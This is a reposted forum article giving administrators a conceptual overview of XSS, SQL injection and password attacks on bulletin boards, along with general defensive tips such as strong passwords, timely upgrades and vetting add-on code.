have a nice post in some forum, hopefully its helpful for you..
When "internet security" is mentioned, most of you probably think of hackers, virii, worms, and Trojan horses, all of which hardly apply to you. But the truth is, internet security is an important issue for anyone online, and is especially significant for anyone running a web site. Forums are big targets for hackers and crackers, due to the fact that bulletin boards members may become argumentative and passionate about their differing opinions. If angered by a banning, a user might try to find nefarious means of rejoining or harming your forum!
What can you do to protect yourself? First, let me cover some background information and basics you should know about security. There are many different kinds of attacks that your forums may be susceptible to. The most common attacks you will encounter are Cross-Site Scripting (XSS) exploits, SQL injections, and password cracking/abusing.
Cross-Site Scripting (XSS) exploits
XSS exploits usually depend on a malicious, specially crafted URL to execute arbitrary code (HTML, JavaScript, etc) in a user's browser, which undermines the user's trust in your site. In layman's terms, it allows someone to embed HTML on your site. For example, an attacker could create a page that impersonates your forum's login screen, but actually just steals a user's password when he or she enters it. Or, using JavaScript, an attacker could intercept information stored in a user's browser (cookies) and use that information to hijack and post under the user's account. NOT something that will add to your forum's popularity, that's for sure!
SQL injections
SQL injections can provide database access to any attacker. SQL injections happen when unchecked variables used in a SQL statement can be modified (generally by the end user with a malformed URL). What does that mean? Basically, SQL exploits extend to the point where the attacker can run any SQL query, thus gaining the power to do almost anything an administrator could do. Obviously, this is a serious threat you want to protect against, as you don't want an attacker to gain complete control over your forum!
Password cracking/abusing
Password cracking is when attackers try to force their way into an account, using a password list or creating random strings. These attempts are generally very weak, as most bulletin board systems will lock an account out after a few (generally, 5) unsuccessful login attempts. Password abusing is simply compromising the proper use of an account, such as a friend logging into his friend's account with a known password, or someone using a known password you use for your admin account. They could obtain this password from any other site you use it on (for example, a forum which does not encrypt passwords).
Why does all of this matter? As I have touched upon, these types of attacks can have huge effects on your community. A hacker could delete users, read/modify any thread, and even delete your forum. As I alluded to above, a hacker could modify posts or custom titles to include malicious HTML which could steal cookies (and allow them to log in under any user), or even utilize the newest Internet Explorer exploit. All of a sudden, it is not just your forum that could be in danger. Are you prepared? In this day and age, attacks are becoming more and more frequent.
Protect your members with these following tips:
* Use strong passwords, and change your password frequantly. This should be obvious, but people neglect password security all the time. Use a strong password, which generally is a password 7 characters or longer with letters and numbers. The more complex your password is, the harder it is to crack, but do not make it so you cannot easily remember it. Leaving a sticky note on your computer with the password can ruin any benefit from a strong password. Remind your members to keep their passwords private.
* Keep yourself informed of exploits that may affect you. At the bottom of this article are links that show all the public current exploits out. Searching for "vBulletin", "phpBB", etc will show you exploits your forums may be susceptible to.
* Keep your bulletin board upgraded to the newest version.
* Add an additional password layer to your mod or admin control panels ( more information here )
* Do not give FTP access to anyone else, even if it's in a subdirectory. If someone can run PHP, they could easily steal your database login information and even set up phpMyAdmin (a popular database managment tool). If you have to give FTP access out (for example, to moderators), use a different domain.
* Only install hacks from a trusted source. If you know PHP, examine all hacks you install. A malicious hack could gain complete control over your forum. Be very wary of hacks that use encrypted code.
* Do not use your forum to give private imformation to anyone (including PMs). In a recent security audit, I found cPanel login information in private messages after I gained database access. Be careful.
Is your security helpless? Hardly. By being smart about your forum's security, you can easily help protect the boards, you, and your members. If you ever see any suspicious activity, change your password and do not be afraid to ask for help.
Resources
The following links can be very helpful in securing your forum:
*
SecurityFocus
*
Packet Storm
*
vBulletin Bug Tracker
*
milw0rm
Your Community's Security
Linear Mode
.gif)
.gif)
